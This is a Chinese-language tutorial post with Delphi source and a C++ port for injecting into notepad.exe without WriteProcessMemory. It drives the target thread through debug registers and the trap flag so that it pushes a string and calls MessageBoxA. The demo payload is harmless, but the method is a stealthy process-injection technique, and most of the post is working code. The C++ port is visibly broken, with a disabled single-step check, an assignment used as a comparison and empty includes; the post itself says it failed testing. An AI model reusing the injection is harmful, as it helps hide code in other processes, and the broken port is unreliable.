如何堆疊推入路徑(Injection without WPM)

修改暫存器達到無須使用 WPM 寫入路徑注入 DLL 的效果
本文特點在於如何在堆疊中推入檔案字串路徑。

感謝網友 Tobyworks 轉換成 C++,Win7 x86 RAD Studio XE2 編譯成功,測試失敗

Delphi:
unit prjBypass;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, tlhelp32;

type
// Main form of the sample: btn2 starts the debugger-driven sequence
// implemented in TForm1.btn2Click; lbl1 is never touched in this unit.
TForm1 = class(TForm)
btn2: TButton;
lbl1: TLabel;
procedure btn2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
// Hand-declared kernel32 imports.
// NOTE(review): OpenThread is declared here but never called anywhere in this unit.
function OpenThread(dwDesiredAccess: DWord;
bInheritHandle: Bool;
dwThreadId: DWord): DWord; stdcall; external 'kernel32.dll';
// Lets the debuggee outlive this debugger process; it is the only "detach"
// step btn2Click performs (no DebugActiveProcessStop call appears in this unit).
function DebugSetProcessKillOnExit(KillOnExit: boolean):boolean; stdcall;external 'kernel32.dll';
var
Form1: TForm1;

implementation

{$R *.dfm}

// Parse a hexadecimal digit string (no '$'/'0x' prefix) into a LongInt.
// Delegates to StrToInt with the Delphi '$' prefix, so malformed input
// raises EConvertError exactly as StrToInt would.
function HexToInt(HexNum: string): LongInt;
var
  prefixed: string;
begin
  prefixed := '$' + HexNum;
  Result := StrToInt(prefixed);
end;

// Block on the debuggee's event stream until a single-step exception arrives.
// Returns True once an EXCEPTION_DEBUG_EVENT whose code is
// EXCEPTION_SINGLE_STEP has been received (that event is left un-continued
// for the caller to acknowledge), and False if the debuggee exits first.
// Every other event is acknowledged with DBG_CONTINUE.
// dDebug is passed by value, so the caller's copy is not updated.
function WaitForData(dDebug:TDebugEvent):Boolean;
var
  isSingleStep: Boolean;
begin
  Result := True;
  while True do
  begin
    WaitForDebugEvent(dDebug, INFINITE);
    if dDebug.dwDebugEventCode = EXCEPTION_DEBUG_EVENT then
    begin
      isSingleStep := dDebug.Exception.ExceptionRecord.ExceptionCode = EXCEPTION_SINGLE_STEP;
      if isSingleStep then
        Break;
    end;
    if dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT then
    begin
      Result := False;
      Exit;
    end;
    ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);
  end;
end;

// Button handler: starts notepad.exe as a debuggee and drives its main thread
// purely by rewriting its CONTEXT (Eip, Eax, debug registers, trap flag) at
// successive single-step stops, never writing into the target's memory.
//
// Defender's view of what this routine exposes: a child created with
// DEBUG_PROCESS, a debugger that repeatedly calls SetThreadContext with
// Dr0/Dr7 and the trap flag set, Eip pointed at hard-coded absolute addresses
// inside the target image, and no DebugActiveProcessStop before returning.
// Absolute addresses such as $01007505 presume a fixed image base, so ASLR
// would be expected to break this sequence — TODO confirm for the target build.
//
// NOTE(review): pi.hProcess / pi.hThread are never closed (handle leak), and
// WaitForData receives dDebug by value, so the events it consumes are invisible
// here; every later ContinueDebugEvent reuses the ids from the first event.
procedure TForm1.btn2Click(Sender: TObject);
var
pi: TProcessInformation;
si: TStartupInfo;
context:_CONTEXT;
dDebug:TDebugEvent;
dwOEP, dwESP, dwEAX, dwECX, dwEBP, dwEDI, dwEBX, dwEDX:DWORD;
begin
FillMemory( @si, sizeof( si ), 0 );
si.cb := sizeof( si );
// CONTEXT_DEBUG_REGISTERS is required so that Dr0/Dr7 below are read and written.
context.ContextFlags:=CONTEXT_FULL or CONTEXT_FLOATING_POINT or CONTEXT_DEBUG_REGISTERS;
If CreateProcess(Nil,PChar('notepad.exe'),Nil, Nil, False,DEBUG_PROCESS, Nil, Nil, si, pi ) then begin

// Wait for the process-creation event; give up if the child exits first.
repeat
WaitForDebugEvent(dDebug,INFINITE);
if dDebug.dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT then
break;
if dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT then
Exit;
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
until 1=3;

//Set BP on OEP
// The code treats Eax at this first stop as the entry point (OEP) — TODO confirm
// this holds on the target OS. Dr0 = address, Dr7 = 1 arms that breakpoint.
GetThreadContext(pi.hThread,context);
dwOEP := context.EAX;
context.Dr0 := dwOEP;
context.Dr7 := 1;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//We are at OEP
//Save Registers, change EIP to push eax
GetThreadContext(pi.hThread,context);
if context.Eip = dwOEP then begin
// Disarm the hardware breakpoint now that it has fired.
context.Dr0 := 0;
context.Dr7 := 0;
//Save Registers
dwEBP := context.Ebp;
dwEAX := context.Eax;
dwEBX := context.Ebx;
dwECX := context.Ecx;
dwEDX := context.Edx;
dwESP := context.Esp;
dwEDI := context.Edi;
// $00796568 as little-endian bytes is 68 65 79 00, i.e. 'h','e','y',NUL —
// appears to be the string value the next steps push onto the stack; verify.
context.Eax := HexToInt('00796568');
// Hard-coded absolute address in the target image; the comment above calls it "push eax".
context.Eip := HexToInt('01007505');
// $0100 is the trap flag (TF): the thread single-steps and WaitForData stops on it.
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
end else
Exit;

if WaitForData(dDebug) = false then
Exit;

//Mov eax, esp
//Push 0
// Eax now holds the stack address of the value pushed above.
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01002290');
context.Eax := context.Esp;
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//push eax
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01001B18');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//push eax
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01001B18');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);


if WaitForData(dDebug) = false then
Exit;

//Push 0
GetThreadContext(pi.hThread,context);
context.Eip := HexToInt('01002290');
context.EFlags := Context.EFlags or $0100;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

//mov eax, messagebox
//call eax
// The address is resolved in THIS process and written into the debuggee's Eax,
// which only works if user32.dll is mapped at the same base in both — assumption.
// Dr0 = Eip + 2 re-arms a hardware breakpoint just past the 2-byte "call eax",
// so the next stop is after the call returns (no trap flag this time).
GetThreadContext(pi.hThread,context);
context.Eax := DWORD(GEtProcAddress(LoadLibrary('user32.dll'),'MessageBoxA'));
context.Eip := HexToInt('01002969');
context.Dr0 := context.Eip + 2;
context.Dr7 := 1;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

if WaitForData(dDebug) = false then
Exit;

GetThreadContext(pi.hThread,context);
//Restore Registers (the original comment said "Save"; these are the saved
//values being written back) and put Eip back on the entry point.
context.Eax := dwEAX;
context.Ebx := dwEBX;
context.Ecx := dwECX;
context.Edx := dwEDX;
context.Esp := dwESP;
context.Edi := dwEDI;
context.Eip := dwOEP;
context.Ebp := dwEBP;
context.Dr0 := 0;
context.Dr7 := 0;
SetThreadContext(pi.hThread,context);
ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);

//Detach Process
// Only kill-on-exit is cleared; the child presumably stays a debuggee of this
// process (no further WaitForDebugEvent loop) until this debugger exits — confirm.
DebugSetProcessKillOnExit(False);
end;
end;

end.

C++
//---------------------------------------------------------------------------

#include 
#pragma hdrstop

#include 
#include 
#include "prjBypass.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
TForm1 *Form1; // global form instance; presumably created by the application's startup code, not in this file
//---------------------------------------------------------------------------
// Form constructor. Nothing beyond the TForm base-class initialisation happens here.
__fastcall TForm1::TForm1(TComponent* Owner) : TForm(Owner)
{
 // intentionally empty
}
//---------------------------------------------------------------------------

// Parse a hexadecimal digit string (no prefix) into a long using the VCL
// StrToInt "$" convention; malformed input raises EConvertError as StrToInt does.
long HexToInt(String HexNum)
{
 String prefixed = "$";
 prefixed += HexNum;
 return StrToInt(prefixed);
}
//---------------------------------------------------------------------------

// Drain the debuggee's event stream.
//
// dDebug is taken BY VALUE, so the events received here never reach the
// caller's copy. Returns false when an EXIT_PROCESS_DEBUG_EVENT arrives.
// Because the EXCEPTION_SINGLE_STEP check is commented out, that is the only
// way out of the loop: every other event, single-step exceptions included, is
// acknowledged with DBG_CONTINUE, and the trailing `return true` is unreachable.
bool WaitForData(TDebugEvent dDebug)
{
 while (1)
 {
  WaitForDebugEvent(&dDebug, INFINITE);
  if (dDebug.dwDebugEventCode == EXCEPTION_DEBUG_EVENT) {
   //if (dDebug.Exception.ExceptionRecord.ExceptionCode == EXCEPTION_SINGLE_STEP)
    //break;
  }
  if (dDebug.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) {
   return false;
  }
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);
 }
 return true;
}

//---------------------------------------------------------------------------

// Button handler: starts notepad.exe as a debuggee and drives its main thread
// by rewriting its CONTEXT (Eip, Eax, debug registers, trap flag) at successive
// debug-event stops, never writing into the target's memory. Port of the
// Delphi btn2Click above.
//
// Defender's view of what this routine exposes: a child created with
// DEBUG_PROCESS, a debugger that repeatedly calls SetThreadContext with
// Dr0/Dr7 and the trap flag set, Eip pointed at hard-coded absolute addresses
// inside the target image, and no DebugActiveProcessStop before returning.
// Absolute addresses such as 0x01007505 presume a fixed image base, so ASLR
// would be expected to break this sequence — TODO confirm for the target build.
//
// NOTE(review): pi.hProcess / pi.hThread are never closed (handle leak), and
// WaitForData receives dDebug by value, so the events it consumes are invisible
// here; every later ContinueDebugEvent reuses the ids from the first event.
void __fastcall TForm1::Button1Click(TObject *Sender)
{
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 _CONTEXT context;
 _DEBUG_EVENT dDebug;
 DWORD dwOEP, dwESP, dwEAX, dwECX, dwEBP, dwEDI, dwEBX, dwEDX;

 FillMemory(&si, sizeof(si), 0);
 si.cb = sizeof(si);
 // CONTEXT_DEBUG_REGISTERS is required so that Dr0/Dr7 below are read and written.
 context.ContextFlags = CONTEXT_FULL | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS;
 if (CreateProcess(NULL, TEXT("notepad.exe"), NULL, NULL, false, DEBUG_PROCESS,
      NULL, NULL, &si, &pi))
 {
  // Wait for the process-creation event; give up if the child exits first.
  while (1)
  {
   WaitForDebugEvent(&dDebug, INFINITE);
   if (dDebug.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
    break;
   }
   // NOTE(review): `=` is assignment, not `==`; the condition is always true.
   if (dDebug.dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT) {
    return;
   }
   ContinueDebugEvent(dDebug.dwProcessId,dDebug.dwThreadId,DBG_CONTINUE);
  }

  //Set BP on OEP
  // The code treats Eax at this first stop as the entry point (OEP) — TODO confirm
  // this holds on the target OS. Dr0 = address, Dr7 = 1 arms that breakpoint.
  GetThreadContext(pi.hThread, &context);
  dwOEP = context.Eax;
  context.Dr0 = dwOEP;
  context.Dr7 = 1;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug)) {
   return;
  }

  //We are at OEP
  //Save Registers, change EIP to push eax
  GetThreadContext(pi.hThread, &context);
  if (context.Eip == dwOEP) {
   // Disarm the hardware breakpoint now that it has fired.
   context.Dr0 = 0;
   context.Dr7 = 0;
   //Save Registers
   dwEBP = context.Ebp;
   dwEAX = context.Eax;
   dwEBX = context.Ebx;
   dwECX = context.Ecx;
   dwEDX = context.Edx;
   dwESP = context.Esp;
   dwEDI = context.Edi;
   // 0x00796568 as little-endian bytes is 68 65 79 00, i.e. 'h','e','y',NUL —
   // appears to be the string value the next steps push onto the stack; verify.
   context.Eax = HexToInt("00796568");
   // Hard-coded absolute address in the target image; the comment above calls it "push eax".
   context.Eip = HexToInt("01007505");
   // 0x0100 is the trap flag (TF): the thread single-steps after this continue.
   context.EFlags = context.EFlags | 0x0100;
   SetThreadContext(pi.hThread, &context);
   ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);
  }
  else
   return;

  if (!WaitForData(dDebug)) {
   return;
  }

  //Mov eax, esp
  //Push 0
  // Eax now holds the stack address of the value pushed above.
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01002290");
  context.Eax = context.Esp;
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //push eax
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01001B18");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug. dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //push eax
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01001B18");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

        //Push 0
  GetThreadContext(pi.hThread, &context);
  context.Eip = HexToInt("01002290");
  context.EFlags = context.EFlags | 0x0100;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  //mov eax, messagebox
  //call eax
  // The address is resolved in THIS process and written into the debuggee's Eax,
  // which only works if user32.dll is mapped at the same base in both — assumption.
  // Dr0 = Eip + 2 re-arms a hardware breakpoint just past the 2-byte "call eax",
  // so the next stop is after the call returns (no trap flag this time).
  GetThreadContext(pi.hThread, &context);
  context.Eax = (DWORD)GetProcAddress(LoadLibrary(TEXT("user32.dll")),"MessageBoxA");
  context.Eip = HexToInt("01002969");
  context.Dr0 = context.Eip + 2;
  context.Dr7 = 1;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  if (!WaitForData(dDebug))
   return;

  GetThreadContext(pi.hThread, &context);
  //Restore Registers (the original comment said "Save"; these are the saved
  //values being written back) and put Eip back on the entry point.
  context.Eax = dwEAX;
  context.Ebx = dwEBX;
  context.Ecx = dwECX;
  context.Edx = dwEDX;
  context.Esp = dwESP;
  context.Edi = dwEDI;
  context.Eip = dwOEP;
  context.Ebp = dwEBP;
  context.Dr0 = 0;
  context.Dr7 = 0;
  SetThreadContext(pi.hThread, &context);
  ContinueDebugEvent(dDebug.dwProcessId, dDebug.dwThreadId, DBG_CONTINUE);

  //Detach Process
  // Only kill-on-exit is cleared; the child presumably stays a debuggee of this
  // process (no further WaitForDebugEvent loop) until this debugger exits — confirm.
  DebugSetProcessKillOnExit(false);
 }
}
//---------------------------------------------------------------------------
